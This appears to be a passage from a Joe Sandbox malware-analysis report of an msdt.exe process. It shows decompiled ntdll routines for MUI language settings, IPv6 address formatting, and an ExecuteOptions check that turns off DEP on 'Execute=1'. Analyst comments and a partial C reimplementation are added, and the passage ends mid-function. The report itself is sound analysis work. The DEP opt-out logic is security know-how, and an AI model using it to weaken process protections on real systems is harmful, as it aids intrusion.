                                                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                            • Instruction ID: 7575cc7a2f0f989154bfc67930d540ce18896101a2080d37b197e39e4e145387
                                                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                            • Instruction Fuzzy Hash: 72D0A7717543083BFA10FAA89C03F6633CC6B55B04F494064F949D73C3D960F9004561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 94%
                                                                            			E02618788(signed int __ecx, void* __edx, signed int _a4) {
                                                                            				signed int _v8;
                                                                            				short* _v12;
                                                                            				void* _v16;
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				char _v44;
                                                                            				signed int _v48;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				signed int _v60;
                                                                            				char _v68;
                                                                            				void* _t216;
                                                                            				intOrPtr _t231;
                                                                            				short* _t235;
                                                                            				intOrPtr _t257;
                                                                            				short* _t261;
                                                                            				intOrPtr _t284;
                                                                            				intOrPtr _t288;
                                                                            				void* _t314;
                                                                            				signed int _t318;
                                                                            				short* _t319;
                                                                            				intOrPtr _t321;
                                                                            				void* _t328;
                                                                            				void* _t329;
                                                                            				char* _t332;
                                                                            				signed int _t333;
                                                                            				signed int* _t334;
                                                                            				void* _t335;
                                                                            				void* _t338;
                                                                            				void* _t339;
                                                                            
                                                                            				_t328 = __edx;
                                                                            				_t322 = __ecx;
                                                                            				_t318 = 0;
                                                                            				_t334 = _a4;
                                                                            				_v8 = 0;
                                                                            				_v28 = 0;
                                                                            				_v48 = 0;
                                                                            				_v20 = 0;
                                                                            				_v40 = 0;
                                                                            				_v32 = 0;
                                                                            				_v52 = 0;
                                                                            				if(_t334 == 0) {
                                                                            					_t329 = 0xc000000d;
                                                                            					L49:
                                                                            					_t334[0x11] = _v56;
                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                            					_t334[0x12] = _v60;
                                                                            					_t334[0x13] = _v28;
                                                                            					_t334[0x17] = _v20;
                                                                            					_t334[0x16] = _v48;
                                                                            					_t334[0x18] = _v40;
                                                                            					_t334[0x14] = _v32;
                                                                            					_t334[0x15] = _v52;
                                                                            					return _t329;
                                                                            				}
                                                                            				_v56 = 0;
                                                                            				if(E02618460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                            					_v56 = 1;
                                                                            					if(_v8 != 0) {
                                                                            						_t207 = E025FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                            					}
                                                                            					_push(1);
                                                                            					_v8 = _t318;
                                                                            					E0261718A(_t207);
                                                                            					_t335 = _t335 + 4;
                                                                            				}
                                                                            				_v60 = _v60 | 0xffffffff;
                                                                            				if(E02618460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                            					_t333 =  *_v8;
                                                                            					_v60 = _t333;
                                                                            					_t314 = E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            					_push(_t333);
                                                                            					_v8 = _t318;
                                                                            					E0261718A(_t314);
                                                                            					_t335 = _t335 + 4;
                                                                            				}
                                                                            				_t216 = E02618460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                            				_t332 = ";";
                                                                            				if(_t216 < 0) {
                                                                            					L17:
                                                                            					if(E02618460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                            						L30:
                                                                            						if(E02618460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                            							L46:
                                                                            							_t329 = 0;
                                                                            							L47:
                                                                            							if(_v8 != _t318) {
                                                                            								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            							}
                                                                            							if(_v28 != _t318) {
                                                                            								if(_v20 != _t318) {
                                                                            									E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                            									_v20 = _t318;
                                                                            									_v40 = _t318;
                                                                            								}
                                                                            							}
                                                                            							goto L49;
                                                                            						}
                                                                            						_t231 = _v24;
                                                                            						_t322 = _t231 + 4;
                                                                            						_push(_t231);
                                                                            						_v52 = _t322;
                                                                            						E0261718A(_t231);
                                                                            						if(_t322 == _t318) {
                                                                            							_v32 = _t318;
                                                                            						} else {
                                                                            							_v32 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            						}
                                                                            						if(_v32 == _t318) {
                                                                            							_v52 = _t318;
                                                                            							L58:
                                                                            							_t329 = 0xc0000017;
                                                                            							goto L47;
                                                                            						} else {
                                                                            							E025F2340(_v32, _v8, _v24);
                                                                            							_v16 = _v32;
                                                                            							_a4 = _t318;
                                                                            							_t235 = E0260E679(_v32, _t332);
                                                                            							while(1) {
                                                                            								_t319 = _t235;
                                                                            								if(_t319 == 0) {
                                                                            									break;
                                                                            								}
                                                                            								 *_t319 = 0;
                                                                            								_t321 = _t319 + 2;
                                                                            								E025FE2A8(_t322,  &_v68, _v16);
                                                                            								if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            									_a4 = _a4 + 1;
                                                                            								}
                                                                            								_v16 = _t321;
                                                                            								_t235 = E0260E679(_t321, _t332);
                                                                            								_pop(_t322);
                                                                            							}
                                                                            							_t236 = _v16;
                                                                            							if( *_v16 != _t319) {
                                                                            								E025FE2A8(_t322,  &_v68, _t236);
                                                                            								if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            									_a4 = _a4 + 1;
                                                                            								}
                                                                            							}
                                                                            							if(_a4 == 0) {
                                                                            								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                            								_v52 = _v52 & 0x00000000;
                                                                            								_v32 = _v32 & 0x00000000;
                                                                            							}
                                                                            							if(_v8 != 0) {
                                                                            								E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                            							}
                                                                            							_v8 = _v8 & 0x00000000;
                                                                            							_t318 = 0;
                                                                            							goto L46;
                                                                            						}
                                                                            					}
                                                                            					_t257 = _v24;
                                                                            					_t322 = _t257 + 4;
                                                                            					_push(_t257);
                                                                            					_v40 = _t322;
                                                                            					E0261718A(_t257);
                                                                            					_t338 = _t335 + 4;
                                                                            					if(_t322 == _t318) {
                                                                            						_v20 = _t318;
                                                                            					} else {
                                                                            						_v20 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            					}
                                                                            					if(_v20 == _t318) {
                                                                            						_v40 = _t318;
                                                                            						goto L58;
                                                                            					} else {
                                                                            						E025F2340(_v20, _v8, _v24);
                                                                            						_v16 = _v20;
                                                                            						_a4 = _t318;
                                                                            						_t261 = E0260E679(_v20, _t332);
                                                                            						_t335 = _t338 + 0x14;
                                                                            						while(1) {
                                                                            							_v12 = _t261;
                                                                            							if(_t261 == _t318) {
                                                                            								break;
                                                                            							}
                                                                            							_v12 = _v12 + 2;
                                                                            							 *_v12 = 0;
                                                                            							E025FE2A8(_v12,  &_v68, _v16);
                                                                            							if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            								_a4 = _a4 + 1;
                                                                            							}
                                                                            							_v16 = _v12;
                                                                            							_t261 = E0260E679(_v12, _t332);
                                                                            							_pop(_t322);
                                                                            						}
                                                                            						_t269 = _v16;
                                                                            						if( *_v16 != _t318) {
                                                                            							E025FE2A8(_t322,  &_v68, _t269);
                                                                            							if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            								_a4 = _a4 + 1;
                                                                            							}
                                                                            						}
                                                                            						if(_a4 == _t318) {
                                                                            							E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                            							_v40 = _t318;
                                                                            							_v20 = _t318;
                                                                            						}
                                                                            						if(_v8 != _t318) {
                                                                            							E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            						}
                                                                            						_v8 = _t318;
                                                                            						goto L30;
                                                                            					}
                                                                            				}
                                                                            				_t284 = _v24;
                                                                            				_t322 = _t284 + 4;
                                                                            				_push(_t284);
                                                                            				_v48 = _t322;
                                                                            				E0261718A(_t284);
                                                                            				_t339 = _t335 + 4;
                                                                            				if(_t322 == _t318) {
                                                                            					_v28 = _t318;
                                                                            				} else {
                                                                            					_v28 = E025FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                            				}
                                                                            				if(_v28 == _t318) {
                                                                            					_v48 = _t318;
                                                                            					goto L58;
                                                                            				} else {
                                                                            					E025F2340(_v28, _v8, _v24);
                                                                            					_v16 = _v28;
                                                                            					_a4 = _t318;
                                                                            					_t288 = E0260E679(_v28, _t332);
                                                                            					_t335 = _t339 + 0x14;
                                                                            					while(1) {
                                                                            						_v12 = _t288;
                                                                            						if(_t288 == _t318) {
                                                                            							break;
                                                                            						}
                                                                            						_v12 = _v12 + 2;
                                                                            						 *_v12 = 0;
                                                                            						E025FE2A8(_v12,  &_v68, _v16);
                                                                            						if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            							_a4 = _a4 + 1;
                                                                            						}
                                                                            						_v16 = _v12;
                                                                            						_t288 = E0260E679(_v12, _t332);
                                                                            						_pop(_t322);
                                                                            					}
                                                                            					_t296 = _v16;
                                                                            					if( *_v16 != _t318) {
                                                                            						E025FE2A8(_t322,  &_v68, _t296);
                                                                            						if(E02615553(_t328,  &_v68,  &_v36) != 0) {
                                                                            							_a4 = _a4 + 1;
                                                                            						}
                                                                            					}
                                                                            					if(_a4 == _t318) {
                                                                            						E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                            						_v48 = _t318;
                                                                            						_v28 = _t318;
                                                                            					}
                                                                            					if(_v8 != _t318) {
                                                                            						E025FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                            					}
                                                                            					_v8 = _t318;
                                                                            					goto L17;
                                                                            				}
                                                                            			}
                                                                            0x02661b2e
                                                                            0x02661b42
                                                                            0x02661b44
                                                                            0x02661b44
                                                                            0x02661b4c
                                                                            0x02661b4f
                                                                            0x02661b55
                                                                            0x02661b55
                                                                            0x026188a4
                                                                            0x026188aa
                                                                            0x026188b1
                                                                            0x026188c5
                                                                            0x02661b5b
                                                                            0x02661b5b
                                                                            0x026188c5
                                                                            0x026188ce
                                                                            0x026188e0
                                                                            0x026188e5
                                                                            0x026188e8
                                                                            0x026188e8
                                                                            0x026188ee
                                                                            0x02618900
                                                                            0x02618900
                                                                            0x02618905
                                                                            0x00000000
                                                                            0x02618905

APIs
Strings
• Kernel-MUI-Language-Disallowed, xrefs: 02618914
• Kernel-MUI-Language-Allowed, xrefs: 02618827
• Kernel-MUI-Number-Allowed, xrefs: 026187E6
• WindowsExcludedProcs, xrefs: 026187C1
• Kernel-MUI-Language-SKU, xrefs: 026189FC
Memory Dump Source
• Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
• Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
Similarity
• API ID: _wcspbrk
• String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
• API String ID: 402402107-258546922
• Opcode ID: c7ea93990968357aa3ef4bd8f47ae2ee38dbb262f5097eebc487113e581135f6
• Instruction ID: fa7059111cd61a766cebb8f265c1f7bc8e023bbaff260190ff81d46c95e4e26a
• Opcode Fuzzy Hash: c7ea93990968357aa3ef4bd8f47ae2ee38dbb262f5097eebc487113e581135f6
• Instruction Fuzzy Hash: 41F106B2D00209EFDF51DF98C9859EEB7B9FF08304F18446AE605A7220E735AA45DF64
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 38%
/* Decompiler output (comments are the analyst's reading of it, not part of the dump).
   The shape matches a textual IPv6 formatter: _a4 points at the eight 16-bit
   address words, _a8 is the output wide-char buffer, and _a8 + 0x5c is its end
   (0x5c bytes = 46 WCHARs, the INET6_ADDRSTRLEN size). E02627707 is called as a
   bounded swprintf-style routine whose return value is the number of WCHARs
   written; the two _t115 string pointers are unresolved in this dump. */
E026313CB(intOrPtr* _a4, intOrPtr _a8) {
	char _v8;          /* number of hex groups to print: 8, or 6 for an ISATAP-style tail */
	intOrPtr _v12;     /* start index of the zero run currently being scanned */
	intOrPtr* _v16;
	intOrPtr _v20;     /* end-of-buffer pointer */
	char _v24;
	intOrPtr _t71;
	signed int _t78;
	signed int _t86;
	char _t90;
	signed int _t91;
	signed int _t96;
	intOrPtr _t108;
	signed int _t114;
	void* _t115;
	intOrPtr _t128;    /* current write position in the output buffer */
	intOrPtr* _t129;   /* address words */
	void* _t130;
	intOrPtr* _t26;

	_t129 = _a4;
	_t128 = _a8;
	_t116 = 0;
	_t71 = _t128 + 0x5c;
	_v8 = 8;
	_v20 = _t71;
	/* Words 0..3 zero and the low 32 bits non-zero: IPv4-embedded forms. */
	if( *_t129 == 0) {
		if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
			goto L5;
		} else {
			_t96 =  *(_t129 + 8) & 0x0000ffff;   /* word 4 */
			if(_t96 != 0) {
				L38:
				if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
					goto L5;
				} else {
					/* word 4 == ffff, word 5 == 0: "::ffff:0:a.b.c.d" */
					_push( *(_t129 + 0xf) & 0x000000ff);
					_push( *(_t129 + 0xe) & 0x000000ff);
					_push( *(_t129 + 0xd) & 0x000000ff);
					_t86 = E02627707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
					L36:
					return _t128 + _t86 * 2;
				}
			}
			_t114 =  *(_t129 + 0xa) & 0x0000ffff;   /* word 5 */
			if(_t114 == 0) {
				L33:
				/* word 5 == 0: "::a.b.c.d" with an (unresolved, likely empty) prefix string */
				_t115 = 0x25f2926;
				L35:
				_push( *(_t129 + 0xf) & 0x000000ff);
				_push( *(_t129 + 0xe) & 0x000000ff);
				_push( *(_t129 + 0xd) & 0x000000ff);
				_push( *(_t129 + 0xc) & 0x000000ff);
				_t86 = E02627707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
				goto L36;
			}
			if(_t114 != 0xffff) {
				_t116 = 0;
				goto L38;
			}
			if(_t114 != 0) {
				/* word 5 == ffff: "::<prefix>a.b.c.d" with the second unresolved prefix string */
				_t115 = 0x25f9cac;
				goto L35;
			}
			goto L33;
		}
	} else {
		L5:
		/* General form: _a4/_a8 are reused as [start, end) of the longest zero run. */
		_a8 = _t116;
		_a4 = _t116;
		_v12 = _t116;
		/* word 4 in {0, 2} and word 5 == 0x5efe in network order: print six hex
		   groups and the last 32 bits in dotted decimal. */
		if(( *(_t129 + 8) & 0x0000fffd) == 0) {
			if( *(_t129 + 0xa) == 0xfe5e) {
				_v8 = 6;
			}
		}
		_t90 = _v8;
		if(_t90 <= _t116) {
			L11:
			/* A single zero word is not worth "::" compression. */
			if(_a8 - _a4 <= 1) {
				_a8 = _t116;
				_a4 = _t116;
			}
			_t91 = 0;
			if(_v8 <= _t116) {
				L22:
				if(_v8 < 8) {
					_push( *(_t129 + 0xf) & 0x000000ff);
					_push( *(_t129 + 0xe) & 0x000000ff);
					_push( *(_t129 + 0xd) & 0x000000ff);
					_t128 = _t128 + E02627707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
				}
				return _t128;
			} else {
				L14:
				/* Emit each group as "%x", separated by ":"; the longest zero run becomes "::". */
				if(_a4 > _t91 || _t91 >= _a8) {
					if(_t91 != _t116 && _t91 != _a8) {
						_push(":");
						_push(_t71 - _t128 >> 1);
						_push(_t128);
						_t128 = _t128 + E02627707() * 2;
						_t71 = _v20;
						_t130 = _t130 + 0xc;
					}
					_t78 = E02627707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
					_t130 = _t130 + 0x10;
				} else {
					_push(L"::");
					_push(_t71 - _t128 >> 1);
					_push(_t128);
					_t78 = E02627707();
					_t130 = _t130 + 0xc;
					_t91 = _a8 - 1;
				}
				_t91 = _t91 + 1;
				_t128 = _t128 + _t78 * 2;
				_t71 = _v20;
				if(_t91 >= _v8) {
					goto L22;
				}
				_t116 = 0;
				goto L14;
			}
		} else {
			/* Scan the words once to find the longest run of zero groups. */
			_t108 = 1;
			_v16 = _t129;
			_v24 = _t90;
			do {
				if( *_v16 == _t116) {
					if(_t108 - _v12 > _a8 - _a4) {
						_a4 = _v12;
						_a8 = _t108;
					}
					_t116 = 0;
				} else {
					_v12 = _t108;
				}
				_v16 = _v16 + 2;
				_t108 = _t108 + 1;
				_t26 =  &_v24;
				 *_t26 = _v24 - 1;
			} while ( *_t26 != 0);
			goto L11;
		}
	}
}
[Per-line instruction address column of the E026313CB listing above (alignment to the code lines was lost); addresses lie in 0x0263138e..0x026314ac and 0x0265e8fd..0x0265ea05]

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 99cecb57b4ca50eddee497d907828ee65808e89d734c997ff2f2ade7be5f97a8
                                                                            • Instruction ID: 2e2c887f3e5fb9216a6b74a31a15503f8de012f9a92f64c750e30199a8114fe7
                                                                            • Opcode Fuzzy Hash: 99cecb57b4ca50eddee497d907828ee65808e89d734c997ff2f2ade7be5f97a8
                                                                            • Instruction Fuzzy Hash: F66139B1D04A55AADF2ACF59C8809BFBBF5EF85310B14C06DE9EA47641D335A740CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                            			E02627EFD(void* __ecx, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				char _v540;
                                                                            				unsigned int _v544;
                                                                            				signed int _v548;
                                                                            				intOrPtr _v552;
                                                                            				char _v556;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t33;
                                                                            				void* _t38;
                                                                            				unsigned int _t46;
                                                                            				unsigned int _t47;
                                                                            				unsigned int _t52;
                                                                            				intOrPtr _t56;
                                                                            				unsigned int _t62;
                                                                            				void* _t69;
                                                                            				void* _t70;
                                                                            				intOrPtr _t72;
                                                                            				signed int _t73;
                                                                            				void* _t74;
                                                                            				void* _t75;
                                                                            				void* _t76;
                                                                            				void* _t77;
                                                                            
                                                                            				_t33 =  *0x26d2088; // 0x7632310a
                                                                            				_v8 = _t33 ^ _t73; // /GS stack cookie (cookie ^ ebp), re-checked by E025FE1B4 at L2
                                                                            				_v548 = _v548 & 0x00000000;
                                                                            				_t72 = _a4;
                                                                            				if(E02627F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) { // reads CheckAppHelp into _v548 (see the log string below)
                                                                            					__eflags = _v548;
                                                                            					if(_v548 == 0) { // CheckAppHelp == 0: nothing to do, return 0
                                                                            						goto L1;
                                                                            					}
                                                                            					_t62 = _t72 + 0x24;
                                                                            					E02643F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                            					_t71 = 0x214;
                                                                            					_v544 = 0x214;
                                                                            					E025FDFC0( &_v540, 0, 0x214);
                                                                            					_t75 = _t74 + 0x20;
                                                                            					_t46 =  *0x26d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62); // BaseQueryModuleData (see APIs): "ExecuteOptions" value into _v540, byte length into _v544
                                                                            					__eflags = _t46;
                                                                            					if(_t46 == 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					_t47 = _v544;
                                                                            					__eflags = _t47;
                                                                            					if(_t47 == 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					__eflags = _t47 - 0x214; // returned length must fit the 0x214-byte buffer
                                                                            					if(_t47 >= 0x214) {
                                                                            						goto L1;
                                                                            					}
                                                                            					_push(_t62);
                                                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0; // wide NUL at the returned byte length (_t47 >> 1 wide chars)
                                                                            					E02643F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                            					_t52 = E02600D27( &_v540, L"Execute=1"); // search the value for L"Execute=1"; non-zero means found
                                                                            					_t76 = _t75 + 0x1c;
                                                                            					_push(_t62);
                                                                            					__eflags = _t52;
                                                                            					if(_t52 == 0) { // not found: walk the space-separated section list instead
                                                                            						E02643F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                            						_t71 =  &_v540;
                                                                            						_t56 = _t73 + _v544 - 0x218;
                                                                            						_t77 = _t76 + 0x14;
                                                                            						_v552 = _t56;
                                                                            						__eflags = _t71 - _t56;
                                                                            						if(_t71 >= _t56) {
                                                                            							goto L1;
                                                                            						} else {
                                                                            							goto L10;
                                                                            						}
                                                                            						while(1) {
                                                                            							L10:
                                                                            							_t62 = E02608375(_t71, 0x20); // find the next L' ' (0x20); the token is NUL-terminated in place below
                                                                            							_pop(_t69);
                                                                            							__eflags = _t62;
                                                                            							if(__eflags != 0) {
                                                                            								__eflags = 0;
                                                                            								 *_t62 = 0;
                                                                            							}
                                                                            							E02643F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                            							_t77 = _t77 + 0x10;
                                                                            							E0266E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                            							__eflags = _t62;
                                                                            							if(_t62 == 0) {
                                                                            								goto L1;
                                                                            							}
                                                                            							_t31 = _t62 + 2; // 0x2
                                                                            							_t71 = _t31;
                                                                            							__eflags = _t71 - _v552;
                                                                            							if(_t71 >= _v552) {
                                                                            								goto L1;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n"); // Execute=1 found: DEP is disabled for this process, return 1
                                                                            					_push(3);
                                                                            					_push(0x55);
                                                                            					E02643F92();
                                                                            					_t38 = 1;
                                                                            					L2:
                                                                            					return E025FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                            				}
                                                                            				L1:
                                                                            				_t38 = 0;
                                                                            				goto L2;
                                                                            			}


                                                                            APIs
                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02643F12
                                                                            Strings
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 0264E345
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02643F4A
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0264E2FB
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02643EC4
                                                                            • ExecuteOptions, xrefs: 02643F04
                                                                            • Execute=1, xrefs: 02643F5E
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02643F75
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: BaseDataModuleQuery
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 3901378454-484625025
                                                                            • Opcode ID: 9c555b24a649b8e148ca3daaa4a18db1956c64d2f80cff0c095e092e200b6796
                                                                            • Instruction ID: be2327d49123d4726f1a8d1079ce55ebab5b4a323f92c87e511e303e42917044
                                                                            • Opcode Fuzzy Hash: 9c555b24a649b8e148ca3daaa4a18db1956c64d2f80cff0c095e092e200b6796
                                                                            • Instruction Fuzzy Hash: E3411871A8071DBAEB21DE94DCC5FEBB3BDAF14704F0005A9A605E6180EB709A458FA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
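
The routine decompiled above (E02627EFD, logging as CLIENT(ntdll)) reads CheckAppHelp, asks BaseQueryModuleData for the module's ExecuteOptions string, and then either takes the Execute=1 opt-out (return 1) or walks the space-separated section list (return 0). The block below is an added, portable C reimplementation of that control flow for readers of this report; it is not code from the sample, from ntdll or from Joe Sandbox. Assumptions: the unnamed helper E02600D27 is modelled as a substring search whose non-zero result means "found", E0266E8DB is modelled as a per-token callback (section_cb), the 0x214-byte buffer and the length checks are taken from the decompilation, and every input string is constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stack buffer the decompiled routine hands to BaseQueryModuleData: 0x214 bytes (_v540, length in _v544). */
#define EXEC_OPTS_BUF_BYTES 0x214u
#define EXEC_OPTS_MAX_UNITS (EXEC_OPTS_BUF_BYTES / 2u)

typedef uint16_t u16;   /* UTF-16 code unit, like the 2-byte wide chars in the dump */

/* Per-token handler, standing in for the unnamed E0266E8DB call (hypothetical). */
typedef void (*section_cb)(const u16 *token, size_t len, void *ctx);

/* Substring search over UTF-16 units; returns the start index or -1.
 * ASSUMPTION: E02600D27(&buf, L"Execute=1") behaves like a substring search. */
static long u16_find(const u16 *hay, size_t hay_len, const char *needle)
{
    size_t nl = 0; while (needle[nl]) nl++;
    if (nl == 0 || nl > hay_len) return -1;
    for (size_t i = 0; i + nl <= hay_len; i++) {
        size_t j = 0;
        while (j < nl && hay[i + j] == (u16)(unsigned char)needle[j]) j++;
        if (j == nl) return (long)i;
    }
    return -1;
}

/* Mirrors the control flow of E02627EFD after the ExecuteOptions lookup.
 * Returns 1 on the "turning off execution protection" path, else 0 (its L1 exit). */
int process_execute_options(const u16 *value, size_t value_bytes,
                            section_cb on_section, void *ctx)
{
    u16 buf[EXEC_OPTS_MAX_UNITS] = {0};

    /* Early exits from the dump: empty value, or one that would not fit the buffer. */
    if (value_bytes == 0 || value_bytes >= EXEC_OPTS_BUF_BYTES)
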